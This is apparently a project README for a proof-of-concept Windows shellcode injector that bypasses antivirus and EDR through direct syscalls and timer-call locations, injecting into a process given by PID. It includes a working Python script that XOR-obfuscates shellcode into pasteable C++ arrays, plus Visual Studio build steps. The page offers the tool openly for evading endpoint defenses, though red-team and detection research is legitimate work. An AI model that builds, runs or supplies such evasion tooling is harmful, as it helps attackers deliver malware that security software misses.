Proof-of-concept Windows shellcode injector to bypass AV and EDR. It currently uses assembly partially generated with the help of SysWhispers to load system call numbers and make the calls. Because that project is outdated, I had to add the last batch of Windows builds myself to make it compatible with all modern Windows versions, from the first release of Windows 10 (1507) to the most recent release of Windows 11 (23H2).
- Decrypts XOR-encrypted shellcode and injects it into a running process identified by the PID passed to the injector
- Uses the Windows timer system calls (NtCreateTimer, NtOpenTimer, NtSetTimer, NtQueryTimer, NtCancelTimer) as the call locations through which its syscalls are made
- Makes syscalls directly from assembly, avoiding ntdll or the Windows API for the calls themselves
- Built with x64 assembly, the Windows API, and the standard C++ libraries
Follow these simple steps to set up your environment and compile the injector:
- Shellcode must be XOR encrypted BEFORE you paste it into the code; otherwise comment out the decryption call (line 31)
- Visual Studio, or another way to compile and link C++ together with assembly (see the compilation steps below for more details)
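The page requires the shellcode to be XOR encrypted before it is pasted into the source but ships no encoder. The script below is an added example, not part of the project's code: it XORs a raw shellcode blob with a repeating key (a single-byte key is the special case), verifies that decryption round-trips, warns about key choices that leave plaintext exposed, and prints the result as a C++ array ready to paste. The array names `shellcode` and `xor_key` and the repeating-key layout are assumptions; match whatever main.cpp's decryption call actually expects. The sample bytes are a constructed placeholder (NOPs, an int3 and a ret), not a real payload.

```python
"""
XOR shellcode encoder (added example, not the project's own tooling).

Assumptions not stated on the page: the injector's decryption loop XORs every
byte of the buffer with a key that repeats over the buffer, and the pasted
arrays are named `shellcode` and `xor_key`.
"""
import sys
from pathlib import Path

# Constructed placeholder, NOT real shellcode: two NOPs, an int3, a ret.
SAMPLE_SHELLCODE = b"\x90\x90\xcc\xc3"
SAMPLE_KEY = b"\x41"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with `key`, repeating the key across the buffer.

    The operation is symmetric: applying it twice with the same key yields
    the original bytes, which is what the injector's decryption relies on.
    """
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def check_key(key: bytes) -> list:
    """Return human-readable warnings about weak key choices."""
    warnings = []
    if 0x00 in key:
        # x ^ 0x00 == x, so every position that lines up with a zero key byte
        # stays in the clear and is still visible to a static scanner.
        warnings.append("key contains 0x00: bytes at those positions are left in plaintext")
    if len(key) == 1:
        warnings.append("single-byte key: only 256 candidates, trivially brute-forced")
    return warnings


def to_cpp_array(name: str, data: bytes, per_line: int = 12) -> str:
    """Render bytes as a C/C++ `unsigned char` array initializer."""
    hex_bytes = ["0x%02x" % b for b in data]
    rows = [", ".join(hex_bytes[i:i + per_line]) for i in range(0, len(hex_bytes), per_line)]
    body = ",\n    ".join(rows)
    return "unsigned char %s[%d] = {\n    %s\n};" % (name, len(data), body)


def encode_shellcode(shellcode: bytes, key: bytes, name: str = "shellcode") -> str:
    """Encrypt `shellcode` and return both arrays as pasteable C++ source."""
    encrypted = xor_bytes(shellcode, key)
    if xor_bytes(encrypted, key) != shellcode:  # round-trip sanity check
        raise RuntimeError("XOR round trip failed")
    return "\n".join([to_cpp_array(name, encrypted), to_cpp_array("xor_key", key)])


if __name__ == "__main__":
    # Usage: python xor_encode.py <raw shellcode file> <key as hex, e.g. 41 or deadbeef>
    if len(sys.argv) == 3:
        data, key = Path(sys.argv[1]).read_bytes(), bytes.fromhex(sys.argv[2])
    else:
        data, key = SAMPLE_SHELLCODE, SAMPLE_KEY
    for w in check_key(key):
        print("warning:", w, file=sys.stderr)
    print(encode_shellcode(data, key))
```

Redirect the output into the source file or a header and replace the existing arrays. Keep in mind that XOR is obfuscation against static signatures, not encryption: once the injector decrypts the buffer in memory, a scanner that inspects the process sees the plaintext payload.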
- Clone or download the repository to your local machine
- Create a new C++ Visual Studio project in that directory
- Add main.cpp and syscalls.asm as source files and wonka.h as a header file
- Make changes to the necessary components (shellcode, XOR key)
- Follow the compilation steps below
Compilation steps:
- Right click on the project name in Solution Explorer and click Build Dependencies --> Build Customizations
- Check the "masm" box and click OK
- Right click syscalls.asm in Solution Explorer and click Properties
- Set "Excluded From Build" to No, "Content" to Yes, and "Item Type" to Microsoft Macro Assembler
- Ready to compile!
Done!